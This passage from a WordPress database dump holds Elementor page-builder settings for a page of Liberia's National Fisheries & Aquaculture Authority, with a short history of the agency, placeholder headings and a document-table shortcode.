in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8abc884\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14211,2268,'_elementor_edit_mode','builder'),(14212,2268,'_elementor_template_type','wp-post'),(14213,2268,'_elementor_version','2.7.5'),(14214,2268,'_wp_page_template','default'),(14215,2268,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aafb093\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.\\n\\nThe overall fisheries sector goal is: Sustainably managed and economically viable\\nfisheries that generate prosperity for the present and generations yet unborn.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c9fcce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2e54ec5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d6bc921\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"70ac5b1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0e5b35e\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mpw\\\" page_length=\\\"false\\\"]\",\"_title\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_z_index\":\"\",\"_element_id\":\"\",\"_css_classes\":\"\",\"jet_family_widget_is_order_orientaion\":\"false\",\"jet_family_widget_order_orientaion\":\"\",\"jet_family_widget_order_orientaion_tablet\":\"\",\"jet_family_widget_order_orientaion_mobile\":\"\",\"jet_family_widget_is_flex_basis\":\"false\",\"jet_family_widget_flex_basis\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"jet_family_widget_flex_basis_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"jet_family_widget_flex_basis_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_animation\":\"\",\"_animation_tablet\":\"\",\"_animation_mobile\":\"\",\"animation_duration\":\"\",\"_animation_delay\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b\":\"#f2295b\",\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_type\":\"linear\",\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_gradient_position\":\"center center\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_position_tablet\":\"\",\"_background_position_mobile\":\"\",\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_repeat_tablet\":\"\",\"_background_repeat_mobile\":\"\",\"_background_size\":\"\",\"_background_size_tablet\":\"\",\"_background_size_mobile\":\"\",\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_video_link\":\"\",\"_background_video_start\":\"\",\"_background_video_end\":\"\",\"_background_play_once\":\"\",\"_background_play_on_mobile\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_slideshow_loop\":\"yes\",\"_background_slideshow_slide_duration\":5000,\"_background_slideshow_slide_transition\":\"fade\",\"_background_slideshow_transition_duration\":500,\"_background_slideshow_ken_burns\":\"\",\"_background_slideshow_ken_burns_zoom_direction\":\"in\",\"_background_hover_background\":\"\",\"_background_hover_color\":\"\",\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b\":\"#f2295b\",\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_type\":\"linear\",\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_gradient_position\":\"center center\",\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_position\":\"\",\"_background_hover_position_tablet\":\"\",\"_background_hover_position_mobile\":\"\",\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_attachment\":\"\",\"_background_hover_repeat\":\"\",\"_background_hover_repeat_tablet\":\"\",\"_background_hover_repeat_mobile\":\"\",\"_background_hover_size\":\"\",\"_background_hover_size_tablet\":\"\",\"_background_hover_size_mobile\":\"\",\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_video_link\":\"\",\"_background_hover_video_start\":\"\",\"_background_hover_video_end\":\"\",\"_background_hover_play_once\":\"\",\"_background_hover_play_on_mobile\":\"\",\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[],\"_background_hover_slideshow_loop\":\"yes\",\"_background_hover_slideshow_slide_duration\":5000,\"_background_hover_slideshow_slide_transition\":\"fade\",\"_background_hover_slideshow_transition_duration\":500,\"_background_hover_slideshow_ken_burns\":\"\",\"_background_hover_slideshow_ken_burns_zoom_direction\":\"in\",\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"_box_shadow_box_shadow_position\":\" \",\"_border_hover_border\":\"\",\"_border_hover_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_color\":\"\",\"_border_radius_hover\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_hover_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_hover_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_hover_box_shadow_type\":\"\",\"_box_shadow_hover_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"_box_shadow_hover_box_shadow_position\":\" \",\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_width\":\"\",\"_element_width_tablet\":\"\",\"_element_width_mobile\":\"\",\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_vertical_align\":\"\",\"_element_vertical_align_tablet\":\"\",\"_element_vertical_align_mobile\":\"\",\"_position\":\"\",\"_offset_orientation_h\":\"start\",\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_orientation_v\":\"start\",\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(14217,2269,'_elementor_edit_mode','builder'),(14218,2269,'_elementor_template_type','wp-post'),(14219,2269,'_elementor_version','2.7.5'),(14220,2269,'_wp_page_template','default'),(14221,2269,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aafb093\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.\\n\\nThe overall fisheries sector goal is: Sustainably managed and economically viable\\nfisheries that generate prosperity for the present and generations yet unborn.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c9fcce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2e54ec5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d6bc921\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"70ac5b1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0e5b35e\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mpw\\\" page_length=\\\"false\\\"]\",\"_title\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_z_index\":\"\",\"_element_id\":\"\",\"_css_classes\":\"\",\"jet_family_widget_is_order_orientaion\":\"false\",\"jet_family_widget_order_orientaion\":\"\",\"jet_family_widget_order_orientaion_tablet\":\"\",\"jet_family_widget_order_orientaion_mobile\":\"\",\"jet_family_widget_is_flex_basis\":\"false\",\"jet_family_widget_flex_basis\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"jet_family_widget_flex_basis_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"jet_family_widget_flex_basis_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_animation\":\"\",\"_animation_tablet\":\"\",\"_animation_mobile\":\"\",\"animation_duration\":\"\",\"_animation_delay\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b\":\"#f2295b\",\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_type\":\"linear\",\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_gradient_position\":\"center center\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_position_tablet\":\"\",\"_background_position_mobile\":\"\",\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_repeat_tablet\":\"\",\"_background_repeat_mobile\":\"\",\"_background_size\":\"\",\"_background_size_tablet\":\"\",\"_background_size_mobile\":\"\",\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_video_link\":\"\",\"_background_video_start\":\"\",\"_background_video_end\":\"\",\"_background_play_once\":\"\",\"_background_play_on_mobile\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_slideshow_loop\":\"yes\",\"_background_slideshow_slide_duration\":5000,\"_background_slideshow_slide_transition\":\"fade\",\"_background_slideshow_transition_duration\":500,\"_background_slideshow_ken_burns\":\"\",\"_background_slideshow_ken_burns_zoom_direction\":\"in\",\"_background_hover_background\":\"\",\"_background_hover_color\":\"\",\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b\":\"#f2295b\",\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_type\":\"linear\",\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_gradient_position\":\"center center\",\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_position\":\"\",\"_background_hover_position_tablet\":\"\",\"_background_hover_position_mobile\":\"\",\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_attachment\":\"\",\"_background_hover_repeat\":\"\",\"_background_hover_repeat_tablet\":\"\",\"_background_hover_repeat_mobile\":\"\",\"_background_hover_size\":\"\",\"_background_hover_size_tablet\":\"\",\"_background_hover_size_mobile\":\"\",\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_video_link\":\"\",\"_background_hover_video_start\":\"\",\"_background_hover_video_end\":\"\",\"_background_hover_play_once\":\"\",\"_background_hover_play_on_mobile\":\"\",\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[],\"_background_hover_slideshow_loop\":\"yes\",\"_background_hover_slideshow_slide_duration\":5000,\"_background_hover_slideshow_slide_transition\":\"fade\",\"_background_hover_slideshow_transition_duration\":500,\"_background_hover_slideshow_ken_burns\":\"\",\"_background_hover_slideshow_ken_burns_zoom_direction\":\"in\",\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"_box_shadow_box_shadow_position\":\" 